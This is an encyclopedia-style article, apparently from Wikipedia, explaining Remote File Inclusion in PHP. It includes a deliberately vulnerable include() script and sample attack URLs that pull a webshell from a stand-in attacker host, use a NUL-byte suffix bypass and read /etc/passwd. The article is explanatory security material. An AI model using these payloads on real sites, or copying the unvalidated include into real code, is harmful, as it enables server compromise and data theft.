Remote file inclusion

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

• Code execution on the web server
• Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
• Denial of Service (DoS)
• Data Theft/Manipulation

Programming languages

PHP

In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function. Most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive, and if enabled it allows filesystem functions to use a URL which allows them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this vulnerability, all user input needs to be validated before being used.

Example

Consider this PHP script (which includes a file specified by request):

<?php
   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   include( $color . '.php' );
?>

<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

• /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing a malicious code.
• /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
• /vulnerable.php?COLOR=C:\\notes.txt%00 - example using NUL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the NUL terminator)
• /vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.

Known Real World Examples

• In May 2011, Imperva’s ADC wrote a comprehensive description of how RFI works and how to avoid it ^[1].
• In June 2011, the Lulzsec attacks relied heavily on RFI, which is described in this Imperva blog ^[2]

See also

Computer Security portal

• Attack (computing)
• Code injection
• Cross-site scripting
• Metasploit Project, an open-source penetration testing tool that includes tests for RFI
• SQL injection
• Threat (computer)
• Vulnerability (computing)
• w3af, an open-source web application security scanner
• Include vulnerability

References

1. "Imperva: Remote File Inclusion". June 2011. http://www.imperva.com/docs/HI_Remote_File_Inclusion.pdf. 
2. "blog.imperva.com: Analyzing the Lulsec Attacks". http://blog.imperva.com/2011/06/analyzing-the-lulzsec-attacks-.html. Retrieved 2011-06-30. 

External links

• Remote File Inclusion Vulnerabilities The Web Application Security Consortium Threat Classification
• Metasploit PHP Remote File Include Generic Exploit
• fimap - A little tool for local and remote file inclusion auditing and exploitation.